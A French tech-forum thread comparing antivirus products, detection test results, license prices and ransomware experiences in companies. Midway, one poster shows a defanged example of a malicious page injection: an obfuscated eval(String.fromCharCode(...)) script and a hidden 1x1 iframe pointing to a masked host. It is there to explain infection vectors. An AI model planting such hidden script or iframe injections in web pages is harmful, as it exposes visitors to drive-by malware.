Reprise du message précédent :
Ils utilisent le moteur de Bitdefender et d'Avira en plus de leur moteur + le cloud    
 
Et il est gratuit    
 
Même si j'en vois déjà se dire: chinois = espionnage & gratuit = c'est toi le produit mais ils font pas les choses à moitié.
 
Pour les testeurs y'a aussi Baidu Antivirus  

Parce que ceux là pensent que seulement en payant t'es plus le produit ?    

Non mais en payant, t'es consentant  

C'est vrai que la différence est flagrante  

 
Oui c'est l'AV chinois qui est bien classé, le hic ce sont les signatures qui sont téléchargées en retard (c'est ce que disent les tests) et dont l'interface n'est pas en français pour le moment (à venir)

Ça fonctionne encore auprès du public les tests sur listing viral préétabli?

Ça valait quelque chose à la sortie de Windows 8, en octobre 2012 : c'était même un des meilleurs du moment.
Manque de bol : il a vite chuté en qualité, au point qu'il a été dégagé des comparatifs. Voilà l'histoire.
 
Du coup, c'est comme IE jusqu'à la version 9 : c'est bon le temps de récupérer un autre AV.

KIS ou Bitdefender : celui que tu trouves au meilleur prix

Windows Defender n'a plus vraiment bonne presse. Norton semble être bien mieux qu'à la grande époque où il était de bon ton de le basher. Reste que si tu as 20€ à y consacrer, ça vaut la peine de prendre une licence d'un an chez Kaspersky (les licences 2013 ou 2014 sont souvent soldées mais valides sur KIS 2015).

 
En général tu trouves les AV moins chers chez Amazon que sur le site des éditeurs    
 
De mémoire, Norton est intéressant mais uniquement si t'as au moins 5 postes    
 
Si tu cherches un AV uniquement y'a Bitdefender AV Essential licence à vie pour 1 poste ( en pratique 5 ans* ) : 21€ chez Amazon
 
*http://download.bitdefender.com/re [...] l_2015.pdf
 
http://www.amazon.fr/Bitdefender-A [...] roduct_top
 
Edit: les éditeurs mettent tellement en avant les Internet security, Total security, qu'on a parfois l'impression de ne pas en avoir pour son argent avec un simple AV.
 
Par exemple chez Bitdefender, la différence entre Essential et Plus est faible**. Je lis pour le premier: AV et Antiphising et pour le second ils ajoutent Antispyware. Mais ils ne disent pas clairement si le premier détecte les spywares ( je pense que oui )... **Sur cette version tu n'as aucun contrôle   ( scan automatique etc ).
 
Face à une menace, ils réagissent de la même manière ?
 
Chez KS c'est plus explicite déjà  

Pas chez tout le monde : je viens encore de voir, dans le dernier 01Net (qui ne déroge donc pas à sa réputation), qu'ils recommandaient encore WD dans un des guides pratiques.
 
P. 78 : "[...] L'outil de Windows se révèle tout aussi efficace que ces programmes payants"
 
À ce stade et après tout ce que j'ai pu apprendre par AmigaOnly ici, ça devient criminel, non ? En même temps, vu qu'ils refourguent des adwares dans leur logithèque repackée exprès...

Pour ne parler que des deux cités au début du message :

McAfee : A éviter. C'est devenu une passoire au fil du temps
Norton : Très bon à ses débuts, un gros passage à vide de plusieurs années et en grande forme depuis environ 2 ou 3 ans. Néanmoins je me suis toujours posé des questions sur la taille des .exe (moteur etc) de cet AV, alors que la concurrence en terme d'efficacité faisait mieux avec une taille jusqu'à 10 fois inférieure

A méditer

http://www.darkreading.com/vulnera [...] id/1112911

Se rappeler ce que disait Microsoft disait au sujet de son antivirus (Anciennement Morro, baptisé ensuite MSE puis Windows dédender)

" Microsoft has admitted Windows users should install antivirus above and beyond its own Security Essentials, describing its protection as merely a "baseline" that will "always be on the bottom" of antivirus software rankings. »"

Traduction libre :

Microsoft reconnait que Security Essentials ne peut pas se substituer à un véritable Anti virus tiers et qu'on ne devrait pas trop compter entièrement sur lui pour protéger son ordinateur.
Que MSE est un logiciel de base et qu'il agit comme une première couche de protection
Microsoft conseille à ses clients d'utiliser un antivirus supplémentaire

PC PRO (revue US située un cran au dessus de 01.net)  vient de faire un test (enfin mi janvier 2015)

"The problem is that Security Essentials can’t offer real peace of mind. In our tests, Security Essentials/Windows Defender allowed the system to be compromised by 41% of threats. Its response to legitimate software boosted its overall accuracy score, but this is still a worrying result. With that the case, we wouldn’t trust our PCs and our data to Security Essentials. Frankly, neither should you.

41% cela fait beaucoup, sachant que les meilleurs AV tournent autour de 99% (le 1% restant était de l'ordre de 3 500 infections non détectées il y a 3 ou 4 ans, je ne sais ce qu'il en est actuellement, mais sachant que certaines infections peuvent faire varier une différence de signature jusqu'à 1500 par heure, aucun labo au monde ne peut suivre. Il faut compter alors sur l'analyse comportementale et autres dont sont dépourvus quelques gratuits)

Et leurs échantillons ne viennent pas des recoins du darknet et ne résulte pas d'une chasse au Zero-day

Il faut considérer l'AV de Microsoft comme un outil de base tout comme le media player, paint, wordpad etc. Le problème c'est que là on ne tourne pas en local où ces applications peuvent suffire pour certains, mais que l'on est en communication avec le net
Et puis tout dépend de QUI se sert du PC sous windows, ses connaissances,  et de ce qu'il fait avec (c'est du meme ordre que de choisir un AV payant ou gratuit que l'on ne peut conseiller à tout le monde. Une réponse générale ne pourra donc être : prend un payant

Microsoft se protège avec sa déclaration sur le peu d'efficacité de son produit, et se protège SURTOUT sur le plan économique et judiciaire pour éviter de se prendre des actions pour position dominante afin de tuer la concurrence

En parlant de payant :  
 
Bitdefender Internet Security 2015 :  Une clé pour 9 mois (il faut une adresse mail valide pour recevoir la clé et cliquer sur "I am not a robot" pour afficher le captcha
 
 
http://www.bitdefender.com/media/h [...] ia-iframe/
 
D'après les retours c'est une version en anglais (mais sur un ancien deal avec softpedia il était possible de mettre la version FR)

Pour les utilisateurs d'Avira, je viens de lire une info intéressante.  
 
Sur le forum http://www.wilderssecurity.com des personnes demandaient pourquoi le prix d'Avira avait augmenté en 2013 ou 2014.  
 
Ils ont obtenu cette réponse:
 
Une licence 1 utilisateur permet d'installer Avira sur 5 appareils.
 
Une licence 3 utilisateurs permet d'installer Avira sur 15 appareils. Vous pouvez acheter la licence et partager celle-ci avec deux autres personnes.
 
J'ai demandé confirmation au support. Lorsque j'ai la réponse, j'edit le message.
 
Réponse:
 
Nos licences protègent tous vos ordinateurs Windows. L’utilisateur est l’adresse email utilisé pendant le processus d’installation, et pas l’appareil. On vous conseille d’avoir un utilisateur par personne (eg: les appareils de votre femme doivent avoir son adresse email, les vôtres votre adresse email, etc)

Les awards d'av-test 2014 viennent de sortir :
http://www.av-test.org/fr/award/2014/
 
Protection pour les particuliers :

 
Protection en entreprise :

Mse
 
Par contre trend est bien classé, perso en ressenti je le trouve pas si efficace que ça en entreprise.

 
MSE est pris comme référence. Même M$ conseille de passer sur un autre AV    

 
Tout comme Norton, Trend Micro (en général il faut éviter de comparer les versions pour particuliers et entreprises) a été très efficace par le passé, a eu un gros passage à vide et revient sur le devant de la scène
 
De mon coté je ne me penche pas sur le ressenti, mais sur des tests persos,  et Trend équipe les postes dont j'ai la charge, en version entreprise, depuis 3 ans. Aucune infection n'est remontée (mais ca ne prouve rien) mais j'ai mis en place des stratégies pour les utilisateurs afin d'éviter les soucis (droits restreints, pas d'usb etc) et les accès internet sont sécurisés
J'ai trouvé Trend très efficace pour la messagerie en tous les cas (dans mes tests)

Justement dans mon entreprise on a trend micro, et les machines infectés j'en ai eu pas mal.
A chaque fois c'était la même chose, une connerie par mail, une piece zip et zou.
 
Idem les utilisateurs n'ont pas de droits admins etc. Mais ils ont forcément accès à des répertoires partagés etc.  
Dans 99% des cas ça c'est soldé par une restauration du poste pour être tranquille, et rien d'autre impacté, mais on s'est aussi pris un "rançonware" qui nous a tout chiffré, et l'av n'y a vu que du feux...  
Bon rien ne dit qu'un autre av aurait vu quelque chose, mais à chaque fois que je testais la pièce jointe en ligne, il y avait toujours 5 à 10 Av qui détecté le virus là ou trend non.

Pour les dernières versions des rançonware, je pense qu'il n'y a pas d'antivirus qui sortent du lot, ils se sont tous pris une bonne claque.
 
Sinon le meilleur outil de réparation est malwarebyte, je pense que c'est mérité, ils font vraiment du bon boulot.
 
Meilleur outil de nettoyage est Kaspersky Removal Tool, je ne l'utilise pas mais je pense que je vais le faire. Seul problème c'est qu'il est assez lourd à télécharger, mais son utilisation est simple.

 
Tu as aussi Norton Power Eraser mais y'a quelques faux positifs. Il est moins performant que KRT d'après AV-Test. Il fait moins de 3 Mo. C'est plus pour les utilisateurs avancés:
 
Etant donné que Norton Power Eraser utilise des méthodes agressives pour détecter ces menaces, il risque de supprimer des programmes légitimes. Si vous supprimez accidentellement un programme légitime, vous pouvez exécuter Norton Power Eraser pour revoir les réparations précédentes et les annuler.
 
Tu as aussi comme stats CRDF. Ils se basent uniquement sur les résultats de Virus Total:
 
https://threatcenter.crdf.fr/?Stats

Salut
 
un nouvel AV en vue : http://uhuru-am.com/
 
D'après 01net, il serait en cours de déploiement dans un ministère français sur 70000 postes :
http://www.01net.com/editorial/645 [...] n-le-jour/
 
Quelqu'un a des infos sur le sujet ?

 
Ils le présentent plus comme un Anti-malware. Ils visent d'abord les grands comptes. Même si la techno est bonne, c'est toujours trop lent le dev des logiciels de sécu  .
 
Le nom du produit est à revoir. Il me fait penser à une distrib linux  
 
Si on remonte dans le passé: https://fr.wikipedia.org/wiki/ViGUARD

Effectivement je ne sais pas d'où ils sortent ce nom...
 
Ce qui est bizarre c'est que tout en bas de leur page web, il est bien indiqué "Anti-malware Antivirus de nouvelle génération"
Serait-ce un abus de langage..?

J'en avais entendu parlé mais indirectement, tout simplement parce que dedans y a http://davfi.fr/

A noter qu'il est prévu pour fonctionner sous linux aussi...

Peut-être une discrète référence à Star Trek  

 
Pas de rapport avec Viguard (on ne va pas refaire la polémique :-)
 
 
Pour rappel  
 
http://www.itespresso.fr/videojero [...] 66619.html
 
Relire
 
http://linuxfr.org/users/moules/jo [...] aux-enfers
 
 
Ensuite tout le monde peut se renseigner sur Jerome Notin qui travaille avec Eric Filliol (projet Eicar) pour le projet actuel
 
 

Heu.. tu as l'accès internet sur les postes de travail ?

En segmentant (si on a le budget qui va bien) cela permet d'éviter ce genre de problèmes ( 2 réseaux physiquement séparés)
Ensuite il est "relativement" facile de blinder un poste internet surtout si on gère les accès derrière (bloquer des tranches d'IP des pays fournisseurs de malware, ou des IP actualisées tous les jours comme on peut le faire avec le fichier Hosts)
J'ai testé des ransomwares, ca ne passait pas. Mais dans l'absolu c'est normal que ca passe sous certaines conditions sur un poste client (no script évite la casse vu que les 3/4 des ransomwares ont pour source des exploits sur site web)
Le reste provient d'un vecteur connu la pièce jointe dans un mail par ex
Mais il faut que des logiciels non à jour et ayant des vulnérabilités soit présents sur l'ordinateur. En général, ce sont les plugins du navigateurs WEB qui sont visés notamment Java ou Adobe Reader/Flash, ensuite ce sont des redirections via un script (merci l'iframe)

Ca ressemble à cela

</head>
<body bgcolor="#464646" leftmargin="0" marginheight="0" marginwidth="0" topmargin="0" bottommargin="0">
<scrxipt type='text/javascript'>eval(String.fromCxharCode(100,111,99,117,120,101,110,116,46,120,114,105,116,101,40,39,60,105,12,114........,114,97,109,101,62,39,41)
</xscript>
<iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>

Enfin je ne vais pas détailler une politique de sécu adaptée pour une sté (je n'ai pas parlé d'une grande entreprise ou d'une administration d'Etat)

Cela me rappelle un admin d'un ring de mairies en France qui m'avait contacté pour un ransonware plutot.. pénible (clés différentes appliquées sur chaque fichier) A l'époque on n'avait pas de solutions (y a un Français qui bosse sur les clés de décryptage mais n'avait pas la solution pur ce cas)
Le problème c'est que les utilisateurs n'avaient pas été sensibilisés et ca cliquait joyeusement sur les "vous avez gagné un Iphone 5, cliquez ici pour recevoir votre cadeau"  ou "Répondez au questionnaire ci joint et gagnez une voiture"
Là aussi un anti spam peut aider pour limiter la casse ou mieux n'accepter les mails QUE du carnet d'adresse (meme si ce n'est pas une sécurité puisque en face si la personne est infectée vous pouvez recevoir un maim+ virus de vos "ami(e)s alors qu'ils n'ont rien envoyé

Pour résumer, il ne faut pas compter QUE sur l'antivirus. AUCUN ne garantit une sécurité à 100%  meme si il est très bon dans les tests

Je sais bien que l'anti virus seul ne peut rien faire, et que comme dit l'usager à chaque fois a été en tord, mais il n’empêche qu'à chaque fois j'ai fais le test sur virus total et d'autres les détectés.

Quand à ma conf, désolé je n'ai pas le choix, chaque utilisateur a besoin d'un accès à internet  et à des lecteurs réseaux de part notre métier, tout comme il se doit de gérer sa boite mail. Et en l’occurrence il n'est pas possible de verrouiller à des carnets d'adresse.
De même nous avons aussi un filtre antispam mais là aussi ça ne bloque pas tout.

 
VIrustotal, comme il a déjà été dit, ne fonctionne qu'avec les bases de signatures, et les AV installés ont d'autres modules qui permettent la détection
Ensuite il faut savoir qu'il existe une sorte de pot commun où sont signalés les "possibles" fichiers malveillants (ce n'est pas du temps réel mais presque) où puisent les AV. Si l'éditeur est réactif il signalera le fichier malveillant (mais ce n'est pas pour cela qu'il sera capable de le désinfecter dans la minute)
 
Autrement se rappeler également que les AV ne sont pas réglés au max de leurs capacités c'est une fois installé qu'il faut se plonger dedans, et là, ca change tout pour l'efficacité, et de plus pour Trend, son truc c'est le cloud avec de l'analyse, car en local en mode déconnecté, il ne fonctionne principalement qu'avec une base virale, et surtout il est bon pour le blocage d'url malicieuse
Au delà de cela, j'ai vu des users qui passaient outre les avertissements parce qu'ils le voulaient cet iphone 5 qu'on leur offrait...
 
Tu as essayé le blocage par fichiers Hosts ?  (perso j'évite ainsi que les gens se connectent sur les boites perso, fassent des achats etc et surtout cela bloque les sites de régies de pub connues pour être pourvoyeuses de malware)

Bonjour,
 
Ma licence Kasperky expire dans moins de 30 jours. J'ai deux PC sous Windows 8.1 64-bits, un smartphone sous Android Lollipop.
 
Que pensez-vous des "antivirus" mobiles, et plus particulièrement des produits mobiles Kaspersky?
 
Est-ce que je peux faire ce type de renouvellement:
Kaspersky Internet Security (3 PC) > Kaspersky Internet Security (2 PC)
Kaspersky Internet Security (3 PC) > Kaspersky Internet Security Multi-Device (3 appareils)
 
Ou il faut que j'achète une "nouvelle" licence?
 
J'ai vu que sur Amazon US les licences sont beaucoup moins chères, est-ce que celles-ci sont compatibles avec les versions françaises (DOM Réunion)?
 
Merci d'avance.
 
EDIT en rouge.

 
Sur Android j'ai testé la version Free de Kaspersky mais je préfère Qihoo360 / Avira ( moins complète ).
 
Elle t'apporte quoi de plus la version payante ?

Sur le site officiel: http://www.kaspersky.fr/android-security
Kaspersky Internet Security for Android
 
Téléchargez la version gratuite offrant les fonctions de base ou achetez la version premium pour bénéficier d'une protection en temps réel et d'une sécurité accrue sur Internet
 
Analyse automatique des applications téléchargées pour vérifier qu'elles ne sont pas infectées par des virus, vers, chevaux de Troie et autres programmes malveillants
Réaction rapide face aux nouvelles menaces grâce à la technologie de protection en temps réel dans le cloud.
 
Version PREMIUM uniquement:

• Protection en temps réel
• Protection Web
• Protection de la vie privée pour smartphones

Je vois que ça qui peut faire la différence:
 
Protection de la vie privée pour smartphones + Protection Web
 
Si quelqu'un utilise votre smartphone Android, comment l'empêcher d'accéder aux détails relatifs à vos communications mobiles privées ? Kaspersky Internet Security pour Android est doté d'une fonction de protection de la vie privée que vous pouvez activer manuellement, automatiquement ou à distance pour facilement masquer vos :
Contacts, Appels reçus, Appels passés, SMS,Journaux d'appels.
 
La protection en temps réel qui n'est incluse que la dans version premium se trouve de base dans la majorité des AV Free:  
 
La version premium de Kaspersky Internet Security pour Android effectue également une analyse antivirus automatique des applications que vous téléchargez ou installez.
 
Je te conseille plutôt une solution gratuite qui joue déjà très bien son rôle.

Pour résumer ma situation.
 
Je paie actuellement une licence pour 3 PC. Or je n'en ai plus que deux. Et comme je dois renouveler la licence, je me demande quelles solutions sont les plus avantageuses.
 
Si je suis obligé de reprendre pour 3, autant que la dernière soit utilisée par mon smartphone.

Anti-virus sous Windows, les cinq solutions les plus téléchargées (Kaspersky & Eset payants + 3 gratuits)

 
En effet mais si tu peux prendre 2 c'est toujours ça en moins sur la facture. Ils ne proposent que 1 ou 3    
 
Sur Amazon.fr --> http://www.amazon.fr/Kaspersky-int [...] =kaspersky

Les versions sur Amazon US sont region locked?

 
De mémoire oui.
 
Tu peux utiliser un VPN pour l'activation mais y'a un risque qu'ils révoquent ta clef...